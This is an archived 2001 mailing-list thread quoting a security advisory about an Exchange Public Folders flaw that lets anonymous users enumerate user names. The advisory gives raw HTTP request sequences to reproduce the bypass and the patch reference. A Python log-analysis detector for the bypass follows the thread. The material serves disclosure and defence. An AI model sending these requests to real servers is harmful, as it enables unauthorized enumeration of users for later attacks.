Re: Exchange Public Folders Information Leakage

From: Noam Rathaus (noamrat_private)
Date: Fri Sep 07 2001 - 16:58:16 PDT


    Sorry,
    
    Note = Not
    
    Thanks
    Noam Rathaus
    http://www.SecuriTeam.com
    http://www.BeyondSecurity.com
    
    Know that you're safe (against Code Red and other vulnerabilities):
    http://www.AutomatedScanning.com/
    
    
      ----- Original Message ----- 
      From: Noam Rathaus 
      To: Felix Huber ; plugins-writersat_private 
      Sent: Friday, September 07, 2001 23:51
      Subject: Re: Exchange Public Folders Information Leakage
    
    
      Hi,
    
      Would a plugin writer note write a plugin for an advisory he releases :} ?
      It's online at: http://scripts.nessus.org
    
    
      Thanks
      Noam Rathaus
      http://www.SecuriTeam.com
      http://www.BeyondSecurity.com
    
      Know that you're safe (against Code Red and other vulnerabilities):
      http://www.AutomatedScanning.com/
    
       
        ----- Original Message ----- 
        From: Felix Huber 
        To: plugins-writersat_private 
        Sent: Friday, September 07, 2001 22:55
        Subject: Fw: Exchange Public Folders Information Leakage
    
    
    
        ----- Original Message -----
        From: "Aviram Jenik" <aviramat_private>
        To: <NTBUGTRAQat_private>
        Sent: Friday, September 07, 2001 11:51 AM
        Subject: Exchange Public Folders Information Leakage
    
    
        > The following security advisory is sent to the securiteam mailing list, and
        > can be found at the SecuriTeam web site: http://www.securiteam.com
        >
        > SUMMARY
        >
        > Microsoft Exchange Server handles anonymous access to its Public Folders
        > insecurely. While administrators may disable the "Find Users" feature to
        > prevent anonymous users from enumerating existing user names, a security
        > flaw in Exchange server allows remote attackers with access to the
        > exchange server to run "Find Users".
        >
        > DETAILS
        >
        > Microsoft Exchange's Public Folders option "Find Users" can be
        > disabled. This, however, does not prevent the users from directly
        > accessing the ASP page (fumsg.asp). The link to "Find Users" will be
        > hidden; however, it is still possible to programmatically access the
        > page.
        >
        > Steps to recreate:
        > 1) Contact:
        > GET /exchange/root.asp?acs=anon HTTP/1.1
        > Host: www.example.com
        >
        >
        > 2) Access the redirected page, and resend the issued cookie.
        > GET /exchange/logonfrm.asp HTTP/1.1
        > Host: www.example.com
        > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
        >
        >
        > 3) Access the redirected page, and resend the issued cookie.
        > GET /exchange/root.asp?acs=anon HTTP/1.1
        > Host: www.example.com
        > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
        >
        >
        > 4) Issue this request to obtain a list of users with the letter 'a' in
        > their name (e.g. Administrator)
        > POST /exchange/finduser/fumsg.asp HTTP/1.1
        > Host: www.example.com
        > Accept: */*
        > Content-Type: application/x-www-form-urlencoded
        > Content-Length: 44
        > Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
        >
        > DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
        >
        > Vendor status:
        > Microsoft has been contacted on August 4, 2001. A security bulletin was
        > released on September 7, 2001.
        >
        > Solution:
        > Microsoft has released a patch for this problem. See Microsoft Security
        > Bulletin MS01-047 for more information:
        > <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-047.asp>
        >
        >
        > ADDITIONAL INFORMATION
        > This security hole was discovered by Noam Rathaus <mailto:noamrat_private>.
        > The information has been provided by SecuriTeam Experts
        > <mailto:expertsat_private>.
        >
        >
        >
        > ====================
        > ====================
        >
        > DISCLAIMER:
        > The information in this bulletin is provided "AS IS" without warranty of
        > any kind. In no event shall we be liable for any damages whatsoever
        > including direct, indirect, incidental, consequential, loss of business
        > profits or special damages.
        >
        >
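The advisory quoted above makes one defensive point worth checking for in server logs: hiding the "Find Users" link does not stop direct POSTs to fumsg.asp from an anonymous session. The following Python is an added example (not from the advisory, SecuriTeam, or the Nessus plugin the thread mentions) that correlates IIS W3C log records to flag a client that opened an anonymous OWA session via root.asp?acs=anon and then posted straight to fumsg.asp; the log lines, addresses and field layout are constructed assumptions.

```python
# Added example: correlate IIS W3C log records to spot the anonymous "Find Users"
# bypass described in the advisory. Sample data is constructed; the #Fields layout
# is an assumption about how the server was configured to log.

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-07 11:51:02 198.51.100.7 GET /exchange/root.asp acs=anon 302
2001-09-07 11:51:03 198.51.100.7 GET /exchange/logonfrm.asp - 302
2001-09-07 11:51:04 198.51.100.7 POST /exchange/finduser/fumsg.asp - 200
2001-09-07 11:52:10 203.0.113.9 GET /exchange/logon.asp - 200
2001-09-07 11:52:11 203.0.113.9 POST /exchange/finduser/fumsg.asp - 200
2001-09-07 11:53:00 198.51.100.7 GET /exchange/root.asp acs=anon 302
"""

FINDUSER_PAGE = "/exchange/finduser/fumsg.asp"   # page named in the advisory
ANON_ENTRY = "/exchange/root.asp"                # step 1 of the advisory, with acs=anon


def parse_w3c(text):
    """Yield one dict per record; the #Fields directive supplies the column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue                     # other directives and blank lines
        if fields is None:
            raise ValueError("record seen before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue                     # skip a malformed record rather than misalign
        yield dict(zip(fields, values))


def find_anonymous_finduser(text):
    """Return (c-ip, time) for each POST to fumsg.asp by a client that earlier
    opened an anonymous session. Clients that never used acs=anon are not flagged,
    so a real logged-on user running Find Users does not produce a hit."""
    anon_clients = set()
    hits = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        query = rec.get("cs-uri-query", "-").lower()
        if stem == ANON_ENTRY and "acs=anon" in query:
            anon_clients.add(rec["c-ip"])
        elif stem == FINDUSER_PAGE and rec["cs-method"] == "POST" \
                and rec["c-ip"] in anon_clients:
            hits.append((rec["c-ip"], rec["time"]))
    return hits
```

Log review of this kind only complements the MS01-047 patch the advisory points to; it shows whether the bypass was exercised, not whether the server is still exposed.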
    



    This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 16:03:53 PDT